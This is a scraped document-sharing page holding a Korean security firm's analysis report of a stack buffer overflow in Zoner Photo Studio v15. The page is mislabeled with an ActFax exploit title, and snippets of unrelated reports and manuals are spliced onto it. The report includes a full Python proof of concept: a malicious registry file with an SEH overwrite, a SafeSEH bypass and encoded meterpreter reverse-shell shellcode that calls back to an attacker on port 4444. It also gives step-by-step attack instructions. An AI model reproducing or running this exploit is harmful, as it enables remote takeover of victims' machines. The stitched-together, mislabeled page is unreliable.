ActFax 4.31 Local Privilege Escalation Exploit

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "ActFax 4.31 Local Privilege Escalation Exploit"

Transcription

1 NSHC 취약점분석보고서 Information Service about a new vulnerability Version 1.0 [ ] 2012 Red Alert. All Rights Reserved.

2 목차 1. 개요 공격 분석 결론 대응방안 참고자료 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 1

3 Confidentiality Agreements 본문서는 Red Alert 팀에서제작한분석보고서로써, RedAlert 팀허가없이배포및공유가가능하나수정은금합니다. 분석보고서는 Red Alert 팀에서운영하는 Facebook 페이지 (https://www.facebook.com/nshc.redalert) 에서확인할수있습니다. Facebook 에등록되는분석보고서를포함한이외의자료들은유료페이지인 isac 페이지 (https://isac.nshc.net) 에서제공받으실수있습니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 2

4 1. 개요.12 년 11 월 9 일에발표된 Zoner 사의 Photo Studio 에관한취약점분석보고서입니다. 특정레 지스터의값을변조하여 Buffer Overflow 를발생되도록합니다. Photo Studio 는프로그램이처음로드할때오류를저장하는레지스터를참조하며이과정에 서데이터의검증과정을거치지않아발생하는 Stack 기반의 Buffer Overflow 취약점입니다. 취약점이름 Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Exploit 최초발표일 2012년 11월 09일 문서작성일 2013년 1월 14일 Version Build 2, Build 3 상태 패치됨 Vender Zoner Author Julien Ahrens 공격범위 local 공격유형 Stack Buffer Overflow 표 1. 취약점정보 Photo Studio 프로그램자체의취약점으로 Sound Editor Pro 가사용될수있는모든 Window 가대상이됩니다.. Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows 2003 Microsoft Windows Vista Microsoft Windows 7 Microsoft Windows 2008 표 2. 대상시스템 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 3

5 2. 공격 가. 공격자의컴퓨터에서 4444 포트를열고대기합니다. 나. 취약한레지스터의값을공격코드가들어있는레지스터값으로교체합니다. 다. 피해자의컴퓨터에서 Photo Studio를실행합니다. 라. 공격자컴퓨터에피해자컴퓨터의 Sehll이뜨는지확인합니다. Photo Studio 는이미지파일을수정하는프로그램입니다.. 그림 1. 대상프로그램 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 4

6 가. 공격자컴퓨터에서 4444 포트를열고대기합니다. 그림 2. 공격자컴퓨터에서대기 나. 취약한레지스터의값을공격코드가들어있는레지스터값으로교체합니다. 그림 3. 공격코드레지스터값삽입 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 5

7 다. 피해자의컴퓨터에서 Photo Studio 를실행합니다. 그림 4. 공격웹페이지로접근 공격코드로인해프로그램이실행되기전에 Crash 가뜨므로실제로는켜지지않습니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 6

8 라. 공격자컴퓨터에피해자컴퓨터의 Sehll 이뜨는지확인합니다. 그림 5. 공격성공화면 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 7

9 3. 분석 위프로그램을공격하기위해 Stack Buffer Overflow, Seh변조, ROP가사용되었습니다. Buffer Overflow의방법중 Stack Buffer Overflow는정상버퍼크기이상의문자열이입력되었을경우정상버퍼를넘어선다른영역을침범하여 Crash를발생시킬수있으며 Crash로인해 exploit을시도할수있습니다. Window 에서에러를제어하기위한 Seh 를악용하여공격자가심어둔 Shellcode 로이동하여 Shellcode 를실행할수있습니다. #!/usr/bin/python from struct import pack file="poc.reg" junk1="\xcc" * 2136 nseh="\xeb\x06\x90\x90" seh=pack('<l',0x0cfad713) # JMP DWORD PTR SS:[EBP-18] - Access: (PAGE_READWRITE) [SafeSEH Bypass] nops="\x90" * 10 junk2="\xcc" * 1000 # msfpayload windows/meterpreter/reverse_tcp LHOST= R msfencode -b '\x00\x0a\x0d\x22\x93' #[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) Sehllcode = ("\xda\xd7\xbb\x4c\xba\x94\xfc\xd9\x74\x24\xf4\x58\x33\xc9" + "\xb1\x49\x83\xc0\x04\x31\x58\x15\x03\x58\x15\xae\x4f\x68" + "\x14\xa7\xb0\x91\xe5\xd7\x39\x74\xd4\xc5\x5e\xfc\x45\xd9" + "\x15\x50\x66\x92\x78\x41\xfd\xd6\x54\x66\xb6\x5c\x83\x49" + "\x47\x51\x0b\x05\x8b\xf0\xf7\x54\xd8\xd2\xc6\x96\x2d\x13" + "\x0e\xca\xde\x41\xc7\x80\x4d\x75\x6c\xd4\x4d\x74\xa2\x52" + "\xed\x0e\xc7\xa5\x9a\xa4\xc6\xf5\x33\xb3\x81\xed\x38\x9b" + "\x31\x0f\xec\xf8\x0e\x46\x99\xca\xe5\x59\x4b\x03\x05\x68" + "\xb3\xcf\x38\x44\x3e\x0e\x7c\x63\xa1\x65\x76\x97\x5c\x7d" + "\x4d\xe5\xba\x08\x50\x4d\x48\xaa\xb0\x6f\x9d\x2c\x32\x63" + "\x6a\x3b\x1c\x60\x6d\xe8\x16\x9c\xe6\x0f\xf9\x14\xbc\x2b" + "\xdd\x7d\x66\x52\x44\xd8\xc9\x6b\x96\x84\xb6\xc9\xdc\x27" + "\xa2\x6b\xbf\x2f\x07\x41\x40\xb0\x0f\xd2\x33\x82\x90\x48" + "\xdc\xae\x59\x56\x1b\xd0\x73\x2e\xb3\x2f\x7c\x4e\x9d\xeb" + "\x28\x1e\xb5\xda\x50\xf5\x45\xe2\x84\x59\x16\x4c\x77\x19" + "\xc6\x2c\x27\xf1\x0c\xa3\x18\xe1\x2e\x69\x31\x8b\xd5\xfa" + "\xfe\xe3\x12\x7c\x96\xf1\x9a\x90\x3b\x7c\x7c\xf8\xd3\x28" + "\xd6\x95\x4a\x71\xac\x04\x92\xac\xc8\x07\x18\x42\x2c\xc9" + "\xe9\x2f\x3e\xbe\x19\x7a\x1c\x69\x25\x51\x0b\x96\xb3\x5d" + "\x9a\xc1\x2b\x5f\xfb\x26\xf4\xa0\x2e\x3d\x3d\x34\x91\x2a" + "\x42\xd8\x11\xab\x14\xb2\x11\xc3\xc0\xe6\x41\xf6\x0e\x33" + "\xf6\xab\x9a\xbb\xaf\x18\x0c\xd3\x4d\x46\x7a\x7c\xad\xad" + "\x7a\x41\x78\x88\xf8\xb3\x0e\xf8\xc0") facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 8

10 poc="windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n" poc=poc + "\"Issuer\"=\"" + junk1 + nseh + seh + nops + Sehllcode + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writefile = open (file, "w") writefile.write( poc ) writefile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; 표 3. 공격코드 Seh와 Nseh를덮어씌기위한 junk값 2136개를삽입합니다. Nseh에는 jmp 6코드를삽입하여 Seh 다음에있는 Nop으로이동하도록합니다. Seh는예외처리문을넘어가기위한 pop pop ret 주소를삽입합니다. Nop이작동후 Sehllcode로넘어갈것입니다. Photo studio의 Bad char인 \x00\x0a\x0d\x22\x93을뺀공격자컴퓨터로접근하게되는 reverse Shellcode입니다.. poc.reg 가실행되면취약레지스터값으로바로삽입되도록레지스터파일형식을맞춰주며 payload 는 junk 값을채워준후 Nseh, Seh, nops, Sehllcode, junk 값이들어갑니다.. 위값을파일에삽입하는과정이며파일이제대로생성되지않거나입력이이루어지지않을경우오류 문자열을출력하게됩니다.. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 9

11 가. Seh 변조 그림 6. Seh 변조 Seh 가 JMP 주소로잘수정된것을볼수있습니다. 나. Nseh 실행 그림 7. Nseh 실행 Nseh 즉, jmp 6 으로인해 NOP 으로넘어갈것입니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 10

12 다. Nop 실행 그림 8. 디버깅을위한 logcat 실행 Nseh 즉, jmp 6 으로인해 NOP 으로넘어와 NOP 이실행됩니다. 라. Sehllcode 실행 그림 9. Sehllcode 실행 Sehllcode 가작동되며공격자컴퓨터에피해자컴퓨터의제어권이넘어가게됩니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 11

13 4. 결론 위취약점은 Photo Studio 는프로그램이처음로드할때오류를저장하는레지스터를참조하며 이과정에서데이터의검증과정을거치지않아버퍼이상의레지스터값을삽입하여 Buffer Overflow 를발생시켜공격자가원하는 Sehllcode 를작동되게합니다. 5. 대응방안 위취약점은레지스터값에대한길이를검증하지않아발생하는문제이므로레지스터의값에대 한검증부분을추가하여야될것입니다. facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 12

14 6. 참고자료 [1] 취약점본문 facebook.com/nshc.redalert 2012 Red Alert. All Rights Reserved. 13

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격..

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격.. 취약점 분석 보고서 [ Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - CVE-2012-1535 ] 2012-08-23 RedAlert Team 안상환 목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리...

More information

Red Alert Malware Report

Red Alert Malware Report NSHC 2014. 11. 17 악성코드분석보고서 [ 인터넷뱅킹메모리해킹 ] 인터넷뱅킹파밍용악성코드가지속적으로배포되고있습니다. 해당악성코드는우리은행, 외환은행, 농협의인터넷뱅킹공인인증서에관련된 ActiveX모듈의메모리를변조하며, 기존보고되었던악성코드기능에추가적으로 Bitcoin Minor 등의기능이추가되었습니다. 감염이의심되는시스템에서는대응방안에따른조치와백신을통한치료가필요합니다.

More information

1.hwp

1.hwp 윈도우 멀티미디어 취약점 분석 방법론 연구 수탁기관 : 한양대학교 산학협력단 2009. 09 25,000 2008 2009(1~8월 ) 20,000 15,000 11,818 10,000 5,000-11,362 3,344 2,756 603 173 2-366 165 1 1 기업 대학 비영리 연구소 네트워크 기타(개인)

More information

AVG PC TuneUp User Manual

AVG PC TuneUp User Manual AVG PC TuneUp 사용자 설명서 문서 수정 AVG.01 (9/16/2015) Copyright AVG Technologies CZ, s.r.o. All rights reserved. 모든 상표는 해당 소유자의 재산입니다. 목차 3 1. AVG PC Tu n e U p 시작! 1.1 시스템 요구 사항 3 1.2 도움말 및 기술 지원 3 4 2. 대시보드

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2012. 12. 19. 취약점 분석 보고서 Information Service about a new vulnerability [ ] 목 차 1. 개 요... 2 2. 공 격... 5 3. 분 석... 9 4. 결 론... 12 5. 대응방안... 12 6. 참고자료... 13 Copyright 2012 Red Alert. All Rights Reserved.

More information

사용 설명서

사용 설명서 Lexmark 1300 Series 사용 설명서 2006년 12월 www.lexmark.com Lexmark 와 다이아몬드 모양의 Lexmark 로고는 미국 및 기타 국가에서 Lexmark International, Inc.의 등록 상표입니다. 그 밖의 모든 상표는 해당 소유권자의 재산입니다. 2007 Lexmark International, Inc. All

More information

Microsoft Word - SEH_Overwrites_Simplified.doc

Microsoft Word - SEH_Overwrites_Simplified.doc SEH Overwrites Simplified v1.01 1 Date : 2007. 10. 29 저자 : Aelphaeis Mangarae 편역 : Kancho ( kancholove@gmail.com, www.securityproof.net ) 머리말 이문서는 Stack 다이어그램을이용하여두개의다른 Windows 플랫폼에서의 SEH Overwrite를다룹니다.

More information

ìœ€íŁ´IP( _0219).xlsx

ìœ€íŁ´IP( _0219).xlsx 차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer

More information

Microsoft Word - Heap_Spray.doc

Microsoft Word - Heap_Spray.doc Heap Spray 본문서는 최근 웹 브라우저를 이용한 공격에 사용되는 Heap Spray 기법에 대한 내용을 수록하였다. 관련 내용에 대하여 많은 도움이 되기 바란다. 문서 내용은 초보자도 쉽게 이해할 수 있도록 관련 내용에 대한 설명을 포함하였다. Hacking Group OVERTIME force< forceteam01@gmail.com > 2007.05.13

More information

4 꼬부랑 이라는 말이 재미있습니다. 5같은 말이 반복이 되어서 지루합니다. 4 꼬부랑 은 굽은 모양을 재미있게 흉내 낸 말입니다. 꼬부랑 을 빼고 읽는 것보다 넣어서 읽 으면 할머니와 엿가락, 강아지의 느낌이 좀 더 실감 나서 재미가 있습니다. 국어2(예습) / 1.

4 꼬부랑 이라는 말이 재미있습니다. 5같은 말이 반복이 되어서 지루합니다. 4 꼬부랑 은 굽은 모양을 재미있게 흉내 낸 말입니다. 꼬부랑 을 빼고 읽는 것보다 넣어서 읽 으면 할머니와 엿가락, 강아지의 느낌이 좀 더 실감 나서 재미가 있습니다. 국어2(예습) / 1. 2016년 1월 2학년 시간표 < > 1주차_[국어] 국어1(예습) / 1. 아, 재미있구나! / 01월 04일 3. 다음은 꼬부랑 을 넣은 것과 뺀 것입니다. 그 느낌을 설명한 것으로 알맞지 않은 것은 무엇입 니까? 1에서 꼬부랑 할머니 는 허리가 굽은 할머니의 모습이 떠오릅니다. 2에서 꼬부랑 고갯길 은 그냥 고갯길 보다 더 많이 굽은 고갯길 같습니다.

More information

목 차 1. 드라이버 설치...3 1.1 설치환경...3 1.2 드라이버 설치 시 주의사항...3 1.3 USB 드라이버 파일...3 1.4 Windows XP에서 설치...4 1.5 Windows Vista / Windows 7에서 설치...7 1.6 Windows

목 차 1. 드라이버 설치...3 1.1 설치환경...3 1.2 드라이버 설치 시 주의사항...3 1.3 USB 드라이버 파일...3 1.4 Windows XP에서 설치...4 1.5 Windows Vista / Windows 7에서 설치...7 1.6 Windows 삼성SDS 하이패스 USB 드라이버 설치 매뉴얼 삼성SDS(주) 목 차 1. 드라이버 설치...3 1.1 설치환경...3 1.2 드라이버 설치 시 주의사항...3 1.3 USB 드라이버 파일...3 1.4 Windows XP에서 설치...4 1.5 Windows Vista / Windows 7에서 설치...7 1.6 Windows 8에서 설치...9 2. 드라이버

More information

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상 Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는

More information

³»Áö_1È£_0107L

³»Áö_1È£_0107L Copyright(c) KONIBP All Rights Reserved. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 49 50 51 52 53 54 55 56 57 58 59

More information

DR-M140 사용 설명서

DR-M140 사용 설명서 사용 설명서 본 스캐너를 사용하기 전에 이 설명서를 읽으십시 오. 이 설명서를 다 읽은 후에는 이후에 참조할 수 있 도록 안전한 곳에 보관하십시오. 보증과 A/S 이 제품에는 보증서가 있습니다. 보증서는 구매처에서 받을 수 있습니다. 구매한 날짜 구매처 등의 기 입을 확인한 후 내용을 정확히 읽고 잘 보관하십시오. 보증기간 보증기간은 구매한 날로부터 1년 입니다.

More information

Adobe Flash 취약점 분석 (CVE-2012-0754)

Adobe Flash 취약점 분석 (CVE-2012-0754) 기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker

More information

Microsoft PowerPoint - ch09 - 연결형리스트, Stack, Queue와 응용 pm0100

Microsoft PowerPoint - ch09 - 연결형리스트, Stack, Queue와 응용 pm0100 2015-1 프로그래밍언어 9. 연결형리스트, Stack, Queue 2015 년 5 월 4 일 교수김영탁 영남대학교공과대학정보통신공학과 (Tel : +82-53-810-2497; Fax : +82-53-810-4742 http://antl.yu.ac.kr/; E-mail : ytkim@yu.ac.kr) 연결리스트 (Linked List) 연결리스트연산 Stack

More information

*금안1512-01-도비라및목차1~9

*금안1512-01-도비라및목차1~9 ISSN 1975-667 215. 12 215. 12 6 5 4 3 2 1 6 5 4 3 2 1 3 145 14 135 13 13 143. 14.7 1.4 9.2 1 7 45 4 35 41.4 85 76.9 76.8 3 7 8 75 125 4 4 1 25 8 6 4 2 2 15 1 5 15 15 36 35.3 36 14 13 12 11 14

More information

01 EDITOR S PICK: 068_ _069

01 EDITOR S PICK: 068_ _069 01 EDITOR S PICK: 068_ _069 070_ _071 02 072_ _073 074_ _075 076_ _077 03 078_ _079 080_ _081 082_ _083 01 086_ _087 088_ _089 090_ _091 092_ _093 094_ _095 02 096_ _097 098_ _099 100_ _101 102_ _103

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

Chapter 4. LISTS

Chapter 4. LISTS C 언어에서리스트구현 리스트의생성 struct node { int data; struct node *link; ; struct node *ptr = NULL; ptr = (struct node *) malloc(sizeof(struct node)); Self-referential structure NULL: defined in stdio.h(k&r C) or

More information

manual pdfÃÖÁ¾

manual pdfÃÖÁ¾ www.oracom.co.kr 1 2 Plug & Play Windows 98SE Windows, Linux, Mac 3 4 5 6 Quick Guide Windows 2000 / ME / XP USB USB MP3, WMA HOLD Windows 98SE "Windows 98SE device driver 7 8 9 10 EQ FM LCD SCN(SCAN)

More information

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

untitled

untitled - -, (insert) (delete) - - (insert) (delete) (top ) - - (insert) (rear) (delete) (front) A A B top A B C top push(a) push(b) push(c) A B top pop() top A B D push(d) top #define MAX_STACK_SIZE 100 int

More information

FD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß

FD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß Copyright (c) 1999-2002 FINAL DATA INC. All right reserved Table of Contents 6 Enterprise for Windows 7 8 Enterprise for Windows 10 Enterprise for Windows 11 12 Enterprise for Windows 13 14 Enterprise

More information

CX2 Camera User Guide

CX2 Camera User Guide 카메라 설명서 본 제품의 시리얼 번호는 카메라 밑면에 기재되어 있습니다. 기본 조작 카메라를 처음 사용하실 때에는 이 장부터 읽으십시오. 이 장에서는 카메라에 대한 기본적인 정보, 즉 카메라 켜는 법, 사진 촬영하 는 법, 사진 재생하는 법을 설명하고 있습니다. 상세 조작 다양한 카메라 기능에 대해 보다 자세한 정보가 필요하시다면 이 장을 읽으 십시오. 이

More information

Microsoft Word - mar6ocmanual_KO

Microsoft Word - mar6ocmanual_KO Exchange Outlook 커넥터용 GFI MailArchiver 6.2 매뉴얼 GIF Software 제작 http://www.gfi.com 전자 메일: info@gfi.com 이 설명서의 내용은 예고 없이 변경될 수 있습니다. 다른 설명이 없는 한 용례에 사용된 회사, 이름 및 데이터는 실제 데이터가 아닙니다. 이 설명서의 어떠한 부분도 GFI Software

More information

P2WW-2620-01HNZ0

P2WW-2620-01HNZ0 P2WW-2620-01HNZ0 ScanSnap Organizer 유저 가이드 시작하기 전에 ScanSnap Organizer 를 구입해 주셔서 감사합니다. 본 유저 가이드는는 개요 및 ScanSnap Organizer 의 화면과 기능에 대해 설명합니다. ScanSnap Organizer 를 사용하기 전에는 바른 사용을 위해서 이 가이드를 반드시 읽어 주십 시오.

More information

11111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111 서울시 금천구 가산동 448 대륭테크노타운 3차 301호 전화 : (02)838-0760 팩스 : (02)838-0782 메일 : support@gyrosoft.co.kr www.gyrosoft.co.kr www.gyro3d.com 매뉴얼 버전 : 1.00 (발행 2008.6.1) 이 설명서의 어느 부분도 자이로소프트(주)의 승인 없이 일부 또는 전부를 복제하여

More information

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E228313232C8A3292E687770> 금융정보화 주요동향 제122호 2010. 3. 30 1. 금융업계 IT동향 2. IT 동향 3. IT 용어 정보시스템본부 종 합 2010. 3월 제122호 1. 금융업계 IT동향 올해 금융IT핵심 화두는 통합, 그리고 모바일 은행, 스마트폰 뱅킹 서비스 강화 증권업계, 공동 통합보안관제 체계 구축 추진 카드업계, 스마트폰 애플리케이션 개발 확산 미래에셋생명,

More information

목차 006/ 008/ 009/ 011/ 012/ 013/ 014/ Part 1_ 컴퓨터가 제대로 작동하지 않을 때 문제00_ 윈도우7 복구(초기화) 방법 안내 문제01_ 컴퓨터의 전원 버튼을 눌러도 아무 반응이 없어요. 문제02_ 전원을 누르면 팬(쿨러)이 돌아가는

목차 006/ 008/ 009/ 011/ 012/ 013/ 014/ Part 1_ 컴퓨터가 제대로 작동하지 않을 때 문제00_ 윈도우7 복구(초기화) 방법 안내 문제01_ 컴퓨터의 전원 버튼을 눌러도 아무 반응이 없어요. 문제02_ 전원을 누르면 팬(쿨러)이 돌아가는 컴퓨터 유지관리 Q&A www.npoit.kr 이 www.fb.com/npoitcenter 책은 컴퓨터를 사용하며 자주 발생하는 문제에 대한 설명 npoit@npoit.kr 및 해결 방법을 담고 있습니다. 컴퓨터를 070-4241-8883 관리할 때 필요한 기초 상식들도 함께 있습니다. 목차 006/ 008/ 009/ 011/ 012/ 013/ 014/ Part

More information

2007

2007 자료공표일 24October 2012 2013 스몰캡 이슈 유진 Small-Cap (1) Windows 8 과 터치의 만남 Small Cap 최순호 Tel. 368-6153 soonho@eugenefn.com Small Cap 팀장 변준호 Tel. 368-6141 juno.byun@eugenefn.com 10월 26일 윈도우 8 출시 Microsoft의 차세대

More information

내용물 시작 3 구성품 4 MDA200 기본 사항 5 액세서리 6 헤드셋 연결 7 탁상 전화기: 연결 및 통화 8 탁상 전화기(표준) 8 탁상 전화기+ HL10 거치대와 전원 공급 장치(별도 구매) 10 탁상 전화기+ EHS 케이블 12 컴퓨터: 연결 및 통화 13 컴

내용물 시작 3 구성품 4 MDA200 기본 사항 5 액세서리 6 헤드셋 연결 7 탁상 전화기: 연결 및 통화 8 탁상 전화기(표준) 8 탁상 전화기+ HL10 거치대와 전원 공급 장치(별도 구매) 10 탁상 전화기+ EHS 케이블 12 컴퓨터: 연결 및 통화 13 컴 MDA200 오디오 스위처 사용 설명서 내용물 시작 3 구성품 4 MDA200 기본 사항 5 액세서리 6 헤드셋 연결 7 탁상 전화기: 연결 및 통화 8 탁상 전화기(표준) 8 탁상 전화기+ HL10 거치대와 전원 공급 장치(별도 구매) 10 탁상 전화기+ EHS 케이블 12 컴퓨터: 연결 및 통화 13 컴퓨터 연결 및 전화 걸기 13 MDA200 LED 표시등

More information

목 차 1. 개요 취약점분석추진배경 CVE 취약점요약 CVE 분석 CVE 취약점개요 CVE 대상시스템목록...

목 차 1. 개요 취약점분석추진배경 CVE 취약점요약 CVE 분석 CVE 취약점개요 CVE 대상시스템목록... 취약점분석보고서 = CVE-2012-0754 = - 서준석연구원 - 2012-08-02 보안프로젝트와한국정보보호교육센터에서공동연구한것입니다. 상업적으로사용하여법적인문제가생기는경우는사용자자신에게책임이 있음을경고합니다. 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. CVE-2012-0754 취약점요약... 1 2. CVE-2012-0754

More information

C 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12

More information

BEef 사용법.pages

BEef 사용법.pages 1.... 3 2.... 3 (1)... 3 (2)... 5 3. BeEF... 7 (1) BeEF... 7 (2)... 8 (3) (Google Phishing)... 10 4. ( )... 13 (1)... 14 (2) Social Engineering... 17 (3)... 19 (4)... 21 5.... 22 (1)... 22 (2)... 27 (3)

More information

IRISCard Anywhere 5

IRISCard Anywhere 5 이 빠른 사용자 가이드는 IRISCard Anywhere 5 및 IRISCard Corporate 5 스캐너의 설치와 시작을 도와 드립니다. 이 스캐너와 함께 제공되는 소프트웨어는: - Cardiris Pro 5 및 Cardiris Corporate 5 for CRM (Windows 용) - Cardiris Pro 4 (Mac OS 용) Cardiris 의

More information

<%DOC NAME%> User Manual

<%DOC NAME%> User Manual AVG AntiVirus 2013 사용자 설명서 문서 버전 2013.11 ( 14.2.2013.) Copy right AV G Tec hnologies CZ, s.r.o. All rights res erv ed. 다른 모든 상표는 해당 소유자의 재산입니다. 이 제품은 RSA Data Sec urity, Inc. MD5 Mes s age- Diges t Algorithm,

More information

윈도우 비스타를 윈도우 7로 업그레이드 1단계 1 단계: Windows 7(윈도우 7)의 어떤 버전으로 업그레이드할 수 있습니까? 아래 표에서는 Windows 7(윈도우 7)로 업그레이드할 수 있는 Windows Vista(윈도우 비스타) 버전에 대해 설명합니다. 업그

윈도우 비스타를 윈도우 7로 업그레이드 1단계 1 단계: Windows 7(윈도우 7)의 어떤 버전으로 업그레이드할 수 있습니까? 아래 표에서는 Windows 7(윈도우 7)로 업그레이드할 수 있는 Windows Vista(윈도우 비스타) 버전에 대해 설명합니다. 업그 Windows 7(윈도우 7) 업그레이드 관리자 현재 PC 에서 Windows 7(윈도우 7)을 실행할 수 있는지 확인합니다. 사용자 PC 가 Windows 7(윈도우 7)을 지원하는지 확인하려면 무료 Windows 7(윈도우 7) 업그레이드 관리자를 다운로드하십시오. 하드웨어, 장치 및 설치된 프로그램의 잠재적인 문제점을 검사하고 업그레이드 전에 수행할 작업을

More information

<30342DBCF6C3B3B8AEBDC3BCB33228C3D6C1BE292E687770>

<30342DBCF6C3B3B8AEBDC3BCB33228C3D6C1BE292E687770> 질산화침전지 유입수 일 차 침전지 질산화 반응조 유출수 반송슬러지 일차슬러지 잉여슬러지 (a) 질산화침전지 유입수 일 차 침전지 포기조 이 차 침전지 질산화조 유출수 반송슬러지 반송슬러지 일차슬러지 잉여슬러지 잉여슬러지 (b) (수산화나트륨) 유입수 일차침전지 반 응 조 이차침전지 처리수 일차침전지슬러지 반송슬러지 잉여슬러지 (a) 순환식질산화탈질법의

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 KeyPad Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착 4x4 Keypad 2 KeyPad 를제어하기위하여 FPGA 내부에 KeyPad controller 가구현 KeyPad controller 16bit 로구성된

More information

MF Driver Installation Guide

MF Driver Installation Guide Korean MF 드라이버 설치설명서 사용자 소프트웨어 CD-ROM... 드라이버 및 소프트웨어 정보...1 지원되는 운영 체제...1 MF 드라이버 및 MF Toolbox 설치... [쉬운 설치]를 사용한 설치...2 [사용자 정의 설치]를 사용한 설치...10 USB 케이블 연결(USB를 이용해 연결하는 경우만)...20 설치 결과 확인...21 온라인

More information

